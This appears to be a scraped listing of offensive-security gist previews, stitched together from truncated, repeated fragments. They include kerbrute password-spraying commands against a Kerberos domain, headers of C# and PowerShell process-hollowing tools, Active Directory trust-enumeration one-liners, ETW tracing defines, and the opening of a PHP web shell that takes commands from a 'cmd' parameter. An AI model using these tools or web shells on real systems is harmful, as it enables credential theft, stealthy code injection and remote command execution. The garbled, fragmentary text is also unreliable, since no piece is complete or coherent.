With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
/*************** | |
* Simple Process Hollowing in C# | |
* | |
* #Build Your Binaries | |
* c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe | |
* | |
* @author: Michael Gorelik <smgorelik@gmail.com> | |
* gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75 | |
* #Most of the code taken from here: @github: github.com/ambray |
Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts | |
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() | |
Grab Forest Trusts. | |
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships() | |
using System; | |
using System.IO; | |
using System.Text; | |
using System.IO.Pipes; | |
using System.Threading; | |
using System.Diagnostics; | |
using System.Security.Principal; | |
using System.Security.AccessControl; | |
using System.Runtime.InteropServices; | |
using System.ComponentModel; |
#define AssemblyDCStart_V1 155 | |
#define MethodLoadVerbose_V1 143 | |
#include <windows.h> | |
#include <stdio.h> | |
#include <wbemidl.h> | |
#include <wmistr.h> | |
#include <evntrace.h> | |
#include <Evntcons.h> |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
function Start-Hollow { | |
<# | |
.SYNOPSIS | |
This is a proof-of-concept for process hollowing. There is nothing new here except | |
maybe the use of NtCreateProcessEx which has some advantages in that it offers a | |
convenient way to set a parent process and avoids the bothersome Get/SetThreadContext. | |
On the flipside CreateRemoteThreadEx/NtCreateThreadEx are pretty suspicious API's. | |
I wrote this POC mostly to educate myself on the mechanics of hollowing. It is possible | |
to load the Hollow from an internal byte array straight into memory but I have not |
/*************** | |
* Simple Process Hollowing in C# | |
* | |
* #Build Your Binaries | |
* c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe | |
* | |
* @author: Michael Gorelik <smgorelik@gmail.com> | |
* gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75 | |
* #Most of the code taken from here: @github: github.com/ambray |
<html> | |
<body> | |
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> | |
<input type="TEXT" name="cmd" autofocus id="cmd" size="80"> | |
<input type="SUBMIT" value="Execute"> | |
</form> | |
<pre> | |
<?php | |
if(isset($_GET['cmd'])) | |
{ |